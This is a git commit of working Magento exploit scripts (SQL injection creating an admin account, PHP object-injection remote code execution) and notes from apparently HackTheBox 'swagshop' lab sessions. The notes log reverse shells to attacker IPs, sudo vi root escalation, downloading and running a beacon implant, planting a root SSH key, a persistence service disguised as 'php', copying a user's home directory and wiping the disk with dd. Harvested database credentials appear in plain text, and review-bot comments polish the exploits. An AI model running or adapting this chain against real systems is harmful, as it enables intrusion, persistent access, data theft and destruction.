Commit 318a5e5

bryfry <bryon@fryer.io>
2025-04-06 09:09:22
w
1 parent f4af930
2025-04-06_wolverine-strike/2025-04-04/exp.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE 
+# Google Dork: "Powered by Magento"
+# Date: 08/18/2015
+# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
+# Vendor Homepage: http://magento.com/
+# Software Link: https://www.magentocommerce.com/download
+# Version: 1.9.0.1 and below
+# Tested on: Ubuntu 15
+# CVE : none
+
+from hashlib import md5
+import sys
+import re
+import base64
+import mechanize
+
+
+def usage():
+    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
+    sys.exit()
+
+
+if len(sys.argv) != 3:
+    usage()
+
+# Command-line args
+target = sys.argv[1]
+arg = sys.argv[2]
+
+# Config.
+username = 'ypwq'
+password = '123'
+php_function = 'system'  # Note: we can only pass 1 argument to the function
+install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml
+
+# POP chain to pivot into call_user_exec
+payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
+          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
+          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
+          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
+          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
+          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
+                                                                                     len(arg), arg)
+# Setup the mechanize browser and options
+br = mechanize.Browser()
+#br.set_proxies({"http": "localhost:8080"})
+br.set_handle_robots(False)
+
+request = br.open(target)
+
+br.select_form(nr=0)
+#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
+br.form.fixup()
+br['login[username]'] = username
+br['login[password]'] = password
+
+br.method = "POST"
+request = br.submit()
+content = request.read()
+
+url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
+url = url.group(1)
+key = re.search("var FORM_KEY = '(.*)'", content.decode())
+key = key.group(1)
+
+request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
+tunnel = tunnel.group(1)
+
+payload = base64.b64encode(payload.encode())
+gh = md5(payload + install_date).hexdigest()
+
+#print("T",tunnel)
+#print("P",payload)
+#print("GH", gh)
+exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
+
+try:
+    request = br.open(exploit)
+except (mechanize.HTTPError, mechanize.URLError) as e:
+    print(e.read().decode())
+            
+
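Review bot: The `except (mechanize.HTTPError, mechanize.URLError) as e` handler at the end of exp.py calls `e.read()`, but `mechanize.URLError` (urllib's URLError) only carries `.reason`, so a connection failure is reported as an AttributeError instead of the real error; split it into `except mechanize.HTTPError as e: print(e.read().decode())` and `except mechanize.URLError as e: print(e.reason)`. `usage()` also prints the literal `%s` placeholders because the string is never formatted — `print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" % (sys.argv[0], sys.argv[0]))`. `username`, `password` and `install_date` are hard-coded per-engagement values with nothing in the header saying they must be updated per target; a line such as `# Engagement-specific: install_date and the admin creds come from this target's local.xml and the poc.py run` would document why. The same file is committed byte-identically again under 2025-04-05/exp.py and 2025-04-06/exp.py; keep one copy and reference it from the day folders.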
2025-04-06_wolverine-strike/2025-04-04/notes.txt
@@ -0,0 +1,46 @@
+2025-04-04T08:07:59-04:00
+
+sudo apt install -y nmap curl python3-venv make zip unzip
+sudo openvpn --config htb.ovpn
+
+### T1 10.129.232.93
+
+ping -c 1 10.129.232.93
+nmap -sV -T4 10.129.232.93
+
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
+
+up, ports open
+
+10.129.232.93 swagshop.htb
+
+curl -L http://swagshop.htb/app/etc/local.xml
+
+magneto software
+10.129.232.93 swagshop.htb
+
+
+curl -L -O https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar
+ 
+  Magento Information
++-----------+------------------+
+| Parameter | Value            |
++-----------+------------------+
+| Edition   | Community        |
+| Version   | 1.9.0.0, 1.9.0.1 |
++-----------+------------------+
+
+2025-04-04T08:28:28-04:00 WORKED
+Check http://swagshop.htb/admin with creds ypwq:123
+masq succes
+
+
+2025-04-04T08:39:33-04:00
+nc -l -p 4444
+python3 exp.py http://swagshop.htb/index.php/admin /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'
+success
+
+running find
+exit
2025-04-06_wolverine-strike/2025-04-04/poc.py
@@ -0,0 +1,39 @@
+import requests
+import base64
+import sys
+
+target = sys.argv[1]
+
+if not target.startswith("http"):
+    target = "http://" + target
+
+if target.endswith("/"):
+    target = target[:-1]
+
+target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
+
+# For demo purposes, I use the same attack as is being used in the wild
+SQLQUERY="""
+SET @SALT = 'rp';
+SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
+SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
+INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
+INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
+"""
+
+# Put the nice readable queries into one line,
+# and insert the username:password combinination
+query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
+pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query).encode()
+
+# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
+r = requests.post(target_url, 
+                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
+                        "filter": base64.b64encode(pfilter),
+                        "forwarded": 1})
+if r.ok:
+    print("WORKED")
+    print("Check {0}/admin with creds ypwq:123".format(target))
+else:
+    print("DID NOT WORK")
+
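Review bot: `target = sys.argv[1]` on the fifth line of poc.py is read with no argument-count check, so running the script without a target dies with an IndexError rather than a usage line; guard it with `if len(sys.argv) != 2: sys.exit("usage: poc.py <target-url>")`. The `ypwq`/`123` pair is spelled out twice, once in the `.format(...)` call and again in the success `print`, so changing one silently desynchronises the message from what was actually created — lift them into `USERNAME = "ypwq"` and `PASSWORD = "123"` at the top and reference both places. The comment above the format call also misspells "combination". `requests` here (and `mechanize` in exp.py) are third-party imports with no requirements file in this commit; the notes install them ad hoc with pip, so pinning them would make the day folders reproducible. The same file appears again byte-identically under 2025-04-06/poc.py.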
2025-04-06_wolverine-strike/2025-04-05/out/php.service
@@ -0,0 +1,12 @@
+[Unit]
+Description=php service
+After=network.target
+
+[Service]
+Type=simple
+Restart=always
+RestartSec=1
+ExecStart=/usr/sbin/php
+
+[Install]
+WantedBy=multi-user.target
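Review bot: The unit file has no comment explaining what `/usr/sbin/php` is; the name suggests the PHP interpreter, while the day's notes show it is a binary fetched with curl and written to that path, and with no `User=` line in `[Service]` it runs as root. For engagement hygiene, record this in the file itself so cleanup cannot miss it, e.g. `# Engagement artifact (<ENGAGEMENT-ID>): not the PHP interpreter; remove this unit and /usr/sbin/php during cleanup`. The identical unit is committed again under 2025-04-06/out/php.service.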
2025-04-06_wolverine-strike/2025-04-05/exp.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE 
+# Google Dork: "Powered by Magento"
+# Date: 08/18/2015
+# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
+# Vendor Homepage: http://magento.com/
+# Software Link: https://www.magentocommerce.com/download
+# Version: 1.9.0.1 and below
+# Tested on: Ubuntu 15
+# CVE : none
+
+from hashlib import md5
+import sys
+import re
+import base64
+import mechanize
+
+
+def usage():
+    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
+    sys.exit()
+
+
+if len(sys.argv) != 3:
+    usage()
+
+# Command-line args
+target = sys.argv[1]
+arg = sys.argv[2]
+
+# Config.
+username = 'ypwq'
+password = '123'
+php_function = 'system'  # Note: we can only pass 1 argument to the function
+install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml
+
+# POP chain to pivot into call_user_exec
+payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
+          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
+          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
+          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
+          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
+          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
+                                                                                     len(arg), arg)
+# Setup the mechanize browser and options
+br = mechanize.Browser()
+#br.set_proxies({"http": "localhost:8080"})
+br.set_handle_robots(False)
+
+request = br.open(target)
+
+br.select_form(nr=0)
+#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
+br.form.fixup()
+br['login[username]'] = username
+br['login[password]'] = password
+
+br.method = "POST"
+request = br.submit()
+content = request.read()
+
+url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
+url = url.group(1)
+key = re.search("var FORM_KEY = '(.*)'", content.decode())
+key = key.group(1)
+
+request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
+tunnel = tunnel.group(1)
+
+payload = base64.b64encode(payload.encode())
+gh = md5(payload + install_date).hexdigest()
+
+#print("T",tunnel)
+#print("P",payload)
+#print("GH", gh)
+exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
+
+try:
+    request = br.open(exploit)
+except (mechanize.HTTPError, mechanize.URLError) as e:
+    print(e.read().decode())
+            
+
2025-04-06_wolverine-strike/2025-04-05/notes.txt
@@ -0,0 +1,101 @@
+### setup
+
+sudo apt install -y \
+	nmap curl python3-venv make zip unzip \
+	mtr
+
+sudo openvpn --config htb.ovpn
+2025-04-05T08:04:58-04:00
+
+### T1 10.129.232.93
+
+ping -c 1 10.129.232.93
+
+python3 -m venv venv
+source venv/bin/activate
+python3 -m pip install mechanize
+python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'"
+2025-04-05T08:05:44-04:00
+
+
+which curl
+/usr/bin/curl
+
+uname -a
+Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+
+cat /etc/os-release
+NAME="Ubuntu"
+VERSION="18.04.6 LTS (Bionic Beaver)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 18.04.6 LTS"
+VERSION_ID="18.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=bionic
+UBUNTU_CODENAME=bionic
+
+sudo -l
+sudo -l
+Matching Defaults entries for www-data on swagshop:
+    env_reset, mail_badpass,
+    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User www-data may run the following commands on swagshop:
+    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
+
+sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
+uid=0(root) gid=0(root) groups=0(root)
+
+mkdir -f /tmp/.X1-lock/
+curl -L -O g
+
+ 10.10.14.4
+
+generate beacon  --http http://10.10.14.4:4444 --seconds 20 --os linux
+http --lport 4444
+
+curl -s -L http://10.10.14.4:8080/php -o /usr/sbin/php
+chmod +x /tmp/.php
+/tmp/.php
+2025-04-05T08:25:45-04:00
+
+root_rsa.pub
+ssh-rsa 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
+
+
+mkdir /root/.ssh/
+upload /home/user/swag/2025-04-05/root_rsa.pub /root/.ssh/authorized_keys
+chmod /root/.ssh/authorized_keys 0400
+
+cat /etc/ssh/sshd_config
+#PermitRootLogin prohibit-password
+
+ssh -vvv root@10.129.232.93 -T /bin/bash
+2025-04-05T08:44:17-04:00
+
+mv /tmp/.php /usr/sbin/php
+
+php service
+
+[Unit]
+Description=php service
+After=network.target
+Type=simple
+Restart=always
+RestartSec=1
+ExecStart=/usr/sbin/php
+
+[Install]
+WantedBy=multi-user.target
+
+upload -o /home/user/swag/2025-04-05/out/php.service /lib/systemd/system/php.service
+execute systemctl daemon-reload
+execute systemctl enable php.service
+execute systemctl start php.service
+
+good service
+
2025-04-06_wolverine-strike/2025-04-05/root_rsa.pub
@@ -0,0 +1,1 @@
+ssh-rsa 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 
2025-04-06_wolverine-strike/2025-04-06/out/php.service
@@ -0,0 +1,12 @@
+[Unit]
+Description=php service
+After=network.target
+
+[Service]
+Type=simple
+Restart=always
+RestartSec=1
+ExecStart=/usr/sbin/php
+
+[Install]
+WantedBy=multi-user.target
2025-04-06_wolverine-strike/2025-04-06/out/root_rsa.pub
@@ -0,0 +1,1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As= 
2025-04-06_wolverine-strike/2025-04-06/exp.py
@@ -0,0 +1,84 @@
+#!/usr/bin/python
+# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE 
+# Google Dork: "Powered by Magento"
+# Date: 08/18/2015
+# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
+# Vendor Homepage: http://magento.com/
+# Software Link: https://www.magentocommerce.com/download
+# Version: 1.9.0.1 and below
+# Tested on: Ubuntu 15
+# CVE : none
+
+from hashlib import md5
+import sys
+import re
+import base64
+import mechanize
+
+
+def usage():
+    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"")
+    sys.exit()
+
+
+if len(sys.argv) != 3:
+    usage()
+
+# Command-line args
+target = sys.argv[1]
+arg = sys.argv[2]
+
+# Config.
+username = 'ypwq'
+password = '123'
+php_function = 'system'  # Note: we can only pass 1 argument to the function
+install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml
+
+# POP chain to pivot into call_user_exec
+payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
+          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
+          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
+          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
+          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
+          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
+                                                                                     len(arg), arg)
+# Setup the mechanize browser and options
+br = mechanize.Browser()
+#br.set_proxies({"http": "localhost:8080"})
+br.set_handle_robots(False)
+
+request = br.open(target)
+
+br.select_form(nr=0)
+#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
+br.form.fixup()
+br['login[username]'] = username
+br['login[password]'] = password
+
+br.method = "POST"
+request = br.submit()
+content = request.read()
+
+url = re.search("ajaxBlockUrl = \'(.*)\'", content.decode())
+url = url.group(1)
+key = re.search("var FORM_KEY = '(.*)'", content.decode())
+key = key.group(1)
+
+request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+tunnel = re.search("src=\"(.*)\?ga=", request.read().decode())
+tunnel = tunnel.group(1)
+
+payload = base64.b64encode(payload.encode())
+gh = md5(payload + install_date).hexdigest()
+
+#print("T",tunnel)
+#print("P",payload)
+#print("GH", gh)
+exploit = tunnel + '?ga=' + payload.decode() + '&h=' + gh
+
+try:
+    request = br.open(exploit)
+except (mechanize.HTTPError, mechanize.URLError) as e:
+    print(e.read().decode())
+            
+
2025-04-06_wolverine-strike/2025-04-06/notes.txt
@@ -0,0 +1,117 @@
+2025-04-06T06:56:22-04:00
+
+sudo apt install -y nmap curl python3-venv make zip unzip
+sudo openvpn --config htb.ovpn
+
+### T1 10.129.232.125
+
+ping -c 1 10.129.232.125
+nmap -sV -T4 10.129.232.125
+
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
+
+up, ports open
+
+magneto software
+10.129.232.125 swagshop.htb
+curl -L http://swagshop.htb/app/etc/local.xml
+
+
+python3 cli.py repl
+set --target 10.129.232.125 
+
+    ๐Ÿ Done! Here's what we found:
+    Install Date: Wed, 08 May 2019 07:23:09 +0000
+    Hostname: localhost
+    Username: root
+    Password: fMVWh7bDHpgZkyfqQXreTjU9
+    Database Name: swagshop
+    Crypt Key: b355a9e0cd018d3f7f03607141518419
+
+python3 poc.py http://swagshop.htb
+create-user --username ypwq --password 123
+
+    ๐Ÿ›ถ Attempting to create a new user with the following creds:
+    username: ypwq
+    password: 123
+    ๐Ÿ Worked! Check 10.129.232.125/admin with creds ypwq:123
+    ๐Ÿ‘‰ Set username to ypwq and password to 123
+
+2025-04-06T07:05:09-04:00
+
+python3 -m venv venv
+source venv/bin/activate
+python3 -m pip install mechanize
+nc -l -p 4444
+python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.153/443 0>&1'"
+2025-04-06T07:28:47-04:00
+
+sudo -l
+Matching Defaults entries for www-data on swagshop:
+    env_reset, mail_badpass,
+    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User www-data may run the following commands on swagshop:
+    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
+
+sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
+uid=0(root) gid=0(root) groups=0(root)
+2025-04-06T07:29:51-04:00
+
+generate beacon  --http http://10.10.16.153:4444 --seconds 20 --os linux
+http --lport 4444
+
+curl -s -L http://10.10.16.153:8080/php -o /usr/sbin/php
+chmod +x /usr/sbin/php
+/usr/sbin/php
+2025-04-06T07:38:36-04:00
+
+root_rsa.pub
+ssh-rsa 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
+
+mkdir /root/.ssh/
+upload /home/user/swag/2025-04-06/out/root_rsa.pub /root/.ssh/authorized_keys
+chmod /root/.ssh/authorized_keys 0400
+
+cat /etc/ssh/sshd_config
+#PermitRootLogin prohibit-password
+
+ssh -vvv root@10.129.232.125 -i out/root_rsa -T /bin/bash
+2025-04-06T07:44:04-04:00
+
+mv /tmp/.php /usr/sbin/php
+
+php service
+    [Unit]
+    Description=php service
+    After=network.target
+
+    [Service]
+    Type=simple
+    Restart=always
+    RestartSec=1
+    ExecStart=/usr/sbin/php
+
+    [Install]
+    WantedBy=multi-user.target
+
+upload -o /home/user/swag/2025-04-06/out/php.service /lib/systemd/system/php.service
+execute systemctl daemon-reload
+execute systemctl enable php.service
+execute systemctl start php.service
+2025-04-06T07:48:54-04:00
+
+find
+download /home/haris/ -r
+
+/bin/dd if=/dev/zero of=/dev/mapper/swagshop--vg-root
+ 2641   2415   root               x86_64   /bin/dd
+2025-04-06T08:06:25-04:00
+
+terminate -F 1
+2025-04-06T08:12:04-04:00
+
+all processes and services non-responsive
+2025-04-06T08:20:52-04:00
2025-04-06_wolverine-strike/2025-04-06/poc.py
@@ -0,0 +1,39 @@
+import requests
+import base64
+import sys
+
+target = sys.argv[1]
+
+if not target.startswith("http"):
+    target = "http://" + target
+
+if target.endswith("/"):
+    target = target[:-1]
+
+target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
+
+# For demo purposes, I use the same attack as is being used in the wild
+SQLQUERY="""
+SET @SALT = 'rp';
+SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
+SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
+INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
+INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
+"""
+
+# Put the nice readable queries into one line,
+# and insert the username:password combinination
+query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
+pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query).encode()
+
+# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
+r = requests.post(target_url, 
+                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
+                        "filter": base64.b64encode(pfilter),
+                        "forwarded": 1})
+if r.ok:
+    print("WORKED")
+    print("Check {0}/admin with creds ypwq:123".format(target))
+else:
+    print("DID NOT WORK")
+